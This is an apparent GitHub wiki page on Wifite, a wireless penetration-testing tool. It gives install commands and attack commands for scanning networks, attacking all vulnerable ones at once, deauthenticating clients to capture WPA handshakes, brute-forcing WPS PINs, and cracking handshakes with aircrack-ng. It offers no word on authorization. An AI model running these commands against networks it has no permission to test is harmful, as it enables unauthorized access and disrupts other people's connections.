Wifite - ikenpachi/Wireless-Attacks-Docs-Red-Team GitHub Wiki

Wifite – Automated Wireless Attack Tool

Introduction

Wifite is an automated penetration testing tool for wireless networks, designed to simplify Wi-Fi attacks by integrating multiple tools like Aircrack-ng, Reaver, Bully, and Cowpatty into a single script. It automates network scanning, handshake capturing, WPS attacks, and brute-force attempts, making it a powerful option for red team operations.

Installation

Linux (Debian/Ubuntu/Kali)

sudo apt update && sudo apt install wifite -y

Arch Linux

sudo pacman -S wifite

Manual Installation (Latest Version)

git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python3 setup.py install

Usage

Basic Scan for Available Networks

sudo wifite --scan

Explanation:

This command scans for nearby wireless networks and lists available targets.

Automated Attack Against All Vulnerable Networks

sudo wifite --all

Explanation:

Automatically attacks all detected vulnerable networks, including WEP, WPA, and WPS-enabled routers.

Targeting a Specific Network

sudo wifite --bssid XX:XX:XX:XX:XX:XX --channel 6

Explanation:

--bssid → Target BSSID (replace with actual MAC address).
--channel → Defines the Wi-Fi channel to focus on.

WPA/WPA2 Handshake Capture

Wifite can capture WPA/WPA2 handshakes for offline password cracking with Aircrack-ng or Hashcat.

sudo wifite --wpa

Process:

Deauthenticates clients to force a re-connection.
Captures the WPA handshake.
Saves it for offline cracking with tools like Hashcat or John the Ripper.

WPS Attacks (Reaver & Bully Integration)

Wifite supports WPS PIN brute-force attacks using Reaver and Bully.

sudo wifite --wps

Explanation:

If a router has WPS enabled, Wifite attempts to brute-force the WPS PIN to retrieve the Wi-Fi password.

For Pixie-Dust attack (offline WPS exploitation), use:

sudo wifite --wps --pixie

Cracking WPA Handshake with Aircrack-ng

Once Wifite captures a WPA handshake, you can crack it using a dictionary attack:

aircrack-ng -w wordlist.txt -b XX:XX:XX:XX:XX:XX handshake.cap

Explanation:

-w wordlist.txt → Specifies a wordlist (e.g., rockyou.txt).
-b XX:XX:XX:XX:XX:XX → BSSID of the target network.
handshake.cap → The captured handshake file.

Additional Features

Supports PMKID attacks to extract hashes from WPA2 networks.
Can auto-select the best attack method based on the target.
Works with external Wi-Fi adapters in monitor mode.

Wifite - ikenpachi/Wireless-Attacks-Docs-Red-Team GitHub Wiki

Wifite – Automated Wireless Attack Tool

Introduction

Installation

Linux (Debian/Ubuntu/Kali)

Arch Linux

Manual Installation (Latest Version)

Usage

Basic Scan for Available Networks

Automated Attack Against All Vulnerable Networks

Targeting a Specific Network

WPA/WPA2 Handshake Capture

WPS Attacks (Reaver & Bully Integration)

Cracking WPA Handshake with Aircrack-ng

Additional Features

References